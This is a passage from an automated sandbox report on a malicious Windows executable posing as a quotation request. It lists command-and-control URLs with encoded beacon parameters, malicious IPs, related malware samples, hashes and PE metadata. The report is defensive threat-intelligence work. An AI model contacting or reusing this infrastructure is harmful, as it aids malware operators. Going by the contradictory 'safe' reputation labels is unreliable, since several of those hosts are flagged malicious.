http://www.letsratethis.com/n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.buffalobooze.com/n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
www.pedroiniesta.net/n7ad/	true	Avira URL Cloud: safe	low
http://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.sloanksmith.com/n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.checkmytradesmanswork.com/n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.graet.design/n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.madisonroselove.com/n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.inthebeginningshop.com/n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.cannabisllp.com/n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW	wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/unguest	QUOTATION REQUEST.exe	false		high
https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty	QUOTATION REQUEST.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
206.189.50.215	www.pedroiniesta.net	United States	14061	DIGITALOCEAN-ASNUS	true
192.185.131.134	freecleanlimpieza.com	United States	46606	UNIFIEDLAYER-AS-1US	true
34.102.136.180	letsratethis.com	United States	15169	GOOGLEUS	false
74.208.236.36	www.sloanksmith.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
46.30.211.38	www.graet.design	Denmark	51468	ONECOMDK	true
81.17.18.196	www.madisonroselove.com	Switzerland	51852	PLI-ASCH	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	402973
Start date:	03.05.2021
Start time:	16:49:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	QUOTATION REQUEST.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@15/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.1% (good quality ratio 15%) Quality average: 76.4% Quality standard deviation: 29.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 69 Number of non-executed functions: 132
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe

Simulations

Behavior and APIs

Time	Type	Description
16:50:16	API Interceptor	1x Sleep call for process: QUOTATION REQUEST.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
206.189.50.215	ord.xlsx	Get hash	malicious	Browse	www.sinjs.com/9t6k/?SH=/JGq4/4YxJz+WdaVKLJbsU3WO4BZskyzMKoifhcEF1OlgJOB0+LWMr5WE/H9GbqUquB5hg==&xJEtAr=ob5t_lh8bBV4p0V
206.189.50.215	HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe	Get hash	malicious	Browse	www.annatdinh.com/rzn/?adsDxBr=LlPhNGcD37JMUumX+kEarYtpi4Klq0VxdtwM/vuCBdiPqvI1ThpQyr489H39FTErr1oN&pPX=EFQxUrT06hHH
46.30.211.38	swift-copy-pdf.exe	Get hash	malicious	Browse	www.exm-droneops.one/e3eb/?njnddT=9rw0FP0HohtL&BjR=GqEi6Yd5KGKXJGsez51P10d6GItuYSt9GG1OTMHeaXK8Y98pInaKDp1JCB8r4VA4RapE
	Order Specifications With Ref Breve#T0876B96.exe	Get hash	malicious	Browse	www.exm-dronesecurity.online/utau/?DXOX-=3XTASjPbMxG7MxVTEoMIj975GwNpPDf6oZ2QEG7EwNJWi3Hjgnc3TCdbxgjDwy3JXd5A&KtxD=ZR-DOT9pJ
	Order Specification Requirement With Ref. AMABINIF38535.exe	Get hash	malicious	Browse	www.exm-dronesecurity.online/utau/?2dZ8=3XTASjPbMxG7MxVTEoMIj975GwNpPDf6oZ2QEG7EwNJWi3Hjgnc3TCdbxgjDwy3JXd5A&p64=8prxehCX
	AWB # 1398021925.exe	Get hash	malicious	Browse	www.kommodore.online/u2e/?lZKh=+ECPvwQ39XtrBM8GQ8ajXb0QqMDuQz+auMik1oYtzqlyZ6i03wadIj53eIsNHkTVe93Q&bbm8x=ohO4_z4XkJ2
	13ORDER_output86FE41F.exe	Get hash	malicious	Browse	www.immo-zee.com/fr/?l8G0YP=i85PPjqH0B&kvJd=XvC3jYZYAdJBJOPZODtAY0GXn+nf53Yl4flYPeh1AF15DOe8WVOZyaObuHVmw7rJcsr5
81.17.18.196	Zahlung SWIft pdf.exe	Get hash	malicious	Browse	www.novatechxf.com/gmn/?1bj=mlcpCduxHNI0Y&EHOh0Ns=9/XspZ693ppetOypWSOLo6AedDse4bDdf4puSoMOnOl8xYo2YgPQ0P9X1PNcFJafpRM9fydGXw==
	Yd7WOb1ksAj378N.exe	Get hash	malicious	Browse	www.amazservices.com/sdh/?1b8Hsf=aObbDgzESH23adbj+cD3wJG55ou7RGWwhU4Zia211xwJ558Q7tSQKjx7tO7i8y7MbYauelwpRQ==&j2MHoV=aDKhQD6PL
	RFQ_R4100131210.pdf.exe	Get hash	malicious	Browse	www.wwwmichiganbulb.com/aepn/?CTJt=fvRhZrK0A2LHGd&uFNl=gBD/03eYOl6TZ4jUScBQavvAu97AjjrwDUvtajBmOQSh5k7jvZ0F4av6otz9/GZBeG8K2OpCWw==
	9JFrEPf5w7.exe	Get hash	malicious	Browse	www.thesahwfam.com/aqu2/?p0G=5EjXvdr19C9mZVkY3fKTgvDOgP0S6WDmsKJe/OA2LcJULTMy4Vts0y1eMk/URiuGJfbh&uFNl=XP7tsTJp
	ntpxrxZCfL.exe	Get hash	malicious	Browse	www.aardvarkquiltshop.com/svh9/?Cda4=0umGITOmcMGS66eYJhV3vdt2NU7vGnAeTKQ9tbnXvxBh/ZWI10b2+VgHMWjGn0QWfvMu&2d=cbC0d
	cV1uaQeOGg.exe	Get hash	malicious	Browse	www.xn--ol-xia.com/hx3a/?wV=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVsnJA5VE4FfYV&PRh0iv=SPxhAX6XM2BTb
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	www.ronpaulmessge17.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=s1XmIF4uAe6fTL2LTbBupw5/VIm+RpLsWjfTUGlIzPAIV2hEXZAxjw34OwCk3cygHcUb
	OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe	Get hash	malicious	Browse	www.gorrillaladders.com/smzu/?D8cH=9r8tQzN8o24l6vY&sXUlfNy=Au4G+9nOBNjwX+6Q2VhyJ/NKJEPsTFPrkjh+1zcY7UOPmsz1D8FaXIEN22BFi0962Fpa
	2021_03_08.exe	Get hash	malicious	Browse	www.curentcareri.com/2bg/?BRDtMX=RyM5PIi/QSOWL5nPv/e6Vp05T6+FVT1jMwP7f0ePw1H5GE8Rbiw/RNFowWbexxgv1bne&M694p=6lX0enMPBdyHut_p
	OVwf3NwhY3.exe	Get hash	malicious	Browse	www.gomonno.com/hks/?-Z=OLMsu5nL0XZchqEa4gjKZmAvw4IYLPHYXjnNPYhzxm2A6I77y1GSfyV/jQvmbgN5QGp+&2de=XnzLMfxH
	Scan_medcal equipment sample_pdf.exe	Get hash	malicious	Browse	www.factoryoutoetstore.com/mnk/
	RFQ for Marjan Development Program.exe	Get hash	malicious	Browse	www.melrosepubliclibrary.com/knf4/?Bv=XeHVmbd+8vcl6PWjCgitAATO7rv+88o+ayIyzDABErlOdMUEckU7qLpHg00nMcOPaBlU&el-=xPILu6SP
	payment advise.exe	Get hash	malicious	Browse	www.evalinkapuppets.com/wgn/?v4Xxa=jh72N97VMjwbOmR7IYrqs0yYsyG8v2l7CsVjR9/4MFsZVL3R6967pIpMUzWAR1CQwb33&sZyLVf=xVMpGjTx
	SKM_C221200706052800.exe	Get hash	malicious	Browse	www.comunityassn.com/s9zh/?aFNTkfLx=tknWlnMldXC7iCBNErlol2ZWcFkzI66RNwK0SX0HwmntnkBHipaMqEQDNIEnuMnu+H34&O2MtVN=iJEt_VihLTLX2JB0
	SHEXD2101127S_ShippingDocument_DkD.xlsx	Get hash	malicious	Browse	www.stonescapes1.com/de92/?Czud=Dpp83lZxpp6l-LP&9rbXut=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==
	Mv Maersk Kleven V949E_pdf.exe	Get hash	malicious	Browse	www.chriswoodgolf.com/p7t/?j6A4f=4z9uOfGNwGWkHbWfi9M5ou+2OgtUAPda65nsDZmgOm3nZIV75jGxAcG92+183yhb0LdpNymLVg==&MZhH=hHcPv2L
	PO190041.exe	Get hash	malicious	Browse	www.batttleroyaleuk.com/xnc/?Ezrp381X=Ok9AvPWPUKYaePVTL6j/d+7uOADfF/hwNe2/6JFu0ZvSkbhtf3C2Uccjo1JvrxSzjNxJ&lhrXP=Szrhs8g
	0VikCnzrVT.exe	Get hash	malicious	Browse	www.thejollychritsmasshop.com/t4vo/?2db=X48HMfxHf&-Z8=Qyo2wOonh0KIH1sRpfIv5e33Rfdwr6JIl7yH0AYUuPUk+FGKMKqwkRB3Y4CjXIZFAlYlGU6emg==
	invoice.exe	Get hash	malicious	Browse	www.newrochellenissan.com/hko6/?EZL0u8=Y+VQ9BZbgPDGGLPS45j8H17ru+3/rc0eIL+UVbdSmBp5MiMxja6tbTfwaOclkfU4QrLd0wJwTg==&GzuL=WDHT983XQdGpy2
	proforma invoice.exe	Get hash	malicious	Browse	www.merhomeimprovement.com/ga4/?AnE=WK4yvbuI6Z1Tg7oDUFoJuBG6KQsoBWQY7UxNok/U1mLpvVknrbotXhp0KJc/c7FVOilx&jFNHH=QrCdRLS

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	f84da301_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	f84da301_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	976ae877_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	65b79c6e_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	87537ed1_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	87537ed1_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	6e9fa6d0_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	6e9fa6d0_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	3f572144_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	3f572144_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	1ed17916_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	1ed17916_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	c27ded69_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	c27ded69_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	58dfce98_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	58dfce98_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	5545d583_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	5545d583_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	ca9bcb50_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
	ca9bcb50_by_Libranalysis.dll	Get hash	malicious	Browse	159.203.93.122
ONEANDONE-ASBrauerstrasse48DE	don.exe	Get hash	malicious	Browse	213.171.195.105
	Request For Quotation -48GH91.pdf.exe	Get hash	malicious	Browse	74.208.5.15
	O1E623TjjW.exe	Get hash	malicious	Browse	213.171.195.105
	product specification.xlsx	Get hash	malicious	Browse	213.171.195.105
	Proforma Invoice.exe	Get hash	malicious	Browse	74.208.5.2
	WaybillDoc_7349796565.pdf.exe	Get hash	malicious	Browse	74.208.236.79
	wMqdemYyHm.exe	Get hash	malicious	Browse	74.208.236.29
	NEW ORDER PO-168-2021.exe	Get hash	malicious	Browse	74.208.5.2
	INV 57474545.doc	Get hash	malicious	Browse	217.160.0.254
	MRQUolkoK7.exe	Get hash	malicious	Browse	217.160.0.158
	#U0420#U0430#U0445#U0443#U043d#U043e#U043a-#U0444#U0430#U043a#U0442#U0443#U0440#U0430.exe	Get hash	malicious	Browse	212.227.15.142
	z5Wqivscwd.exe	Get hash	malicious	Browse	74.208.236.235
	Updated April SOA.xlsx	Get hash	malicious	Browse	74.208.236.137
	y6f8O0kbEB.exe	Get hash	malicious	Browse	217.160.0.211
	978463537_BL FOR APPROVAL.doc	Get hash	malicious	Browse	217.160.0.254
	PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exe	Get hash	malicious	Browse	217.76.128.34
	APR SOA---- Worldwide Partner--WWP SC+SHA.PDF.exe	Get hash	malicious	Browse	217.76.128.34
	VIKRAMQST21-222.exe	Get hash	malicious	Browse	217.76.128.34
	29910022-001.exe	Get hash	malicious	Browse	74.208.5.15
	SHIPPING DOCS.exe	Get hash	malicious	Browse	74.208.5.15
UNIFIEDLAYER-AS-1US	gunzipped.exe	Get hash	malicious	Browse	192.254.189.182
	Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exe	Get hash	malicious	Browse	162.144.13.239
	0145d964_by_Libranalysis.exe	Get hash	malicious	Browse	162.241.169.22
	HXxk3mzZeW.exe	Get hash	malicious	Browse	192.185.140.111
	HCU213DES.doc	Get hash	malicious	Browse	162.241.169.22
	RFQ.exe	Get hash	malicious	Browse	192.254.236.251
	a3aa510e_by_Libranalysis.exe	Get hash	malicious	Browse	192.185.221.204
	Outstanding Payment Plan.xls	Get hash	malicious	Browse	192.185.129.69
	FULL SOA $16848.exe	Get hash	malicious	Browse	192.185.113.120
	BL Draft - HL-88312627.exe	Get hash	malicious	Browse	192.254.180.165
	ARIX SRLVl (MN) - Italy.exe	Get hash	malicious	Browse	192.254.185.244
	DocNo2300058329.doc__.rtf	Get hash	malicious	Browse	74.220.199.6
	NINGBO_STATEMENT OF ACCOUNT.exe	Get hash	malicious	Browse	192.185.226.148
	signed contract invoice.exe	Get hash	malicious	Browse	192.254.236.251
	DUBAI UAE HCU4321890.exe	Get hash	malicious	Browse	162.241.169.22
	Payment Copy 0002.exe	Get hash	malicious	Browse	50.87.153.37
	diagram-586750002.xlsm	Get hash	malicious	Browse	192.185.46.61
	diagram-586750002.xlsm	Get hash	malicious	Browse	192.185.46.61
	nFmioaYJMR.exe	Get hash	malicious	Browse	192.185.140.111
	statistic-1048881972.xlsm	Get hash	malicious	Browse	192.254.233.89

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log Download File
Process:	C:\Users\user\Desktop\QUOTATION REQUEST.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.923340384145363
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	QUOTATION REQUEST.exe
File size:	745984
MD5:	64af41000584694858d0fcc37b1bf69b
SHA1:	707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256:	fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
SHA512:	dff4927081ff280eb4e707660c596adfbf8ada0f02cdbf8dd2414cb368b8036708558e854b892eda7dc0049c11df6ff1044cb0ec7c9ae9a32851ba3790fd7177
SSDEEP:	12288:xEPgph+pOidPx8aabrfIdyI8xejcPpjTp0tN8z4b5sT762uM+42QK4UkegeIH3zS:+YepFPORrfIfeKcPpjdEWGO76SIuUkqZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z..`..............P..N..........Bl... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4b6c42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x608FAD7A [Mon May 3 07:59:54 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb6bf0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb8000	0xe98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xba000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb4c48	0xb4e00	False	0.938404349516	data	7.93143837904	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xb8000	0xe98	0x1000	False	0.370849609375	data	4.72334355235	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
